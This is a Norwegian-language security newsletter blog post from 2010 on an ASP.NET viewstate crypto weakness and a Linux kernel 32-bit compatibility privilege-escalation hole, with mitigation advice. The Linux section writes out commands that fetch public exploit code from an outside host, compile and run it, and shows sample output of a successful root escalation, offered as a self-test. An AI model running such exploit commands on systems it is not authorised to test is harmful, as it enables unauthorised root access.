Vi gjør oppmerksom på at informasjonen gitt i denne bloggen er ferskvare og således kan inneholde feil. Aksjoner som gjøres på grunnlag av denne er på eget ansvar. Telenor tar ikke ansvar for innhold gitt i eksterne lenker.

Monday, 20 September 2010

2010.09.20 - Nyhetsbrev

Microsoft har kommet ut med en advarsel om en svakhet i ASP.NET og Linux-kjernen er sårbar for en svakhet i 32-bits emuleringen. Begge disse rangeres som kritisk og blir aktivt utnyttet.

Svakhet i ASP.NET (Microsoft Security Advisory #2416728)

Microsoft har kommet med informasjon om en svakhet i ASP.NET som vil gi en angriper mulighet til å lese og endre viewstate som er blitt kryptert av server.

Viewstate brukes i ASP .NET for å kunne beholde tilstanden (state) mellom ulike postback til webserver, og gjøres ved at nettsiden inneholder et skjult kryptert felt som lagrer den nødvendige informasjonen. Angrepet utføres ved å modifisere viewstate og sende dette tilbake til server for så å observere responsen fra server. Ved å gjøre dette gjenatte ganger skal det være mulig å tilegne seg nok informasjon til å kunne dekryptere, lese, samt modifisere viewstate som sendes tilbake til server.

Denne svakheten er allerede blitt demonstrert (av forskere), og vi vet jo at kriminelle ikke ligger på latsiden.
Anbefaling
Vent på patch ifra Microsoft.
Referanser
https://www.microsoft.com/technet/security/advisory/2416728.mspx
http://it.slashdot.org/story/10/09/19/1941258/Researchers-Demo-ASPNET-Crypto-Attack
http://it.slashdot.org/story/10/09/13/167239/New-Crypto-Attack-Affects-Millions-of-ASPNET-Apps

Sikkerhetshull i Linux-kjernen gir root-tilgang

Exploitkode har blitt publisert på hvordan du kan utnytte et sikkerhetshull i Linux-kjernen for å øke dine egne rettigheter til å gi deg root-tilgang. Koden benytter seg av en svakhet i kompatibilitetsmodusen til kjernen som gjør at du kan kjøre 32-bits-applikasjoner på x86_64-arkitektur.

Utviklerne av Linux-kjernen har laget en patch for å fikse problemet, men denne har ikke blitt pushet ut til de stabile utgivelsene enda.

Se vedlegg for informasjon om hvordan en kan verifisere svakheten.
Anbefaling
Inntil det kommer ny utgave av Linux-kjernen, skru av 32-bits-emulering. Dersom du benytter en distribusjon som publiserer egne patchede versjoner av Linuxkjerna, så anbefaler vi at du oppgraderer til siste utgave.

Det er også mulig å slå av muligheten for å kjøre 32-bits programmer på et 64-bits system.

Dersom du vil teste om systemet ditt er sårbart, kan du laste ned exploitkoden, og kjøre følgende kommandoer:

bruker@server$ wget http://sota.gen.nz/compat2/robert_you_suck.c
bruker@server$ gcc robert_you_suck.c -o robert

Hvis systemet er sårbart, vil det se slik ut:
bruker@server$ ./robert
resolved symbol commit_creds to 0xffffffff8106ca60
resolved symbol prepare_kernel_cred to 0xffffffff8106cf90
mapping at 3f80000000
UID 0, EUID:0 GID:0, EGID:0
root@server#

Hvis systemet ikke er sårbart, vil det se slik ut:
bruker@server$ ./robert
symbol table not available, aborting!
Process finished
Referanser
http://seclists.org/fulldisclosure/2010/Sep/273
http://sota.gen.nz/compat2/
http://sota.gen.nz/compat2/robert_you_suck.c

Full HTML-versjon av dagens nyhetsbrev.

No comments:

Post a Comment

Retningslinjer for kommentarer
Alle kommentarer vil bli gjennomlest før de blir publisert. Kommentarer som er usaklige, har støtende eller upassende innhold vil bli slettet av moderator.

 
>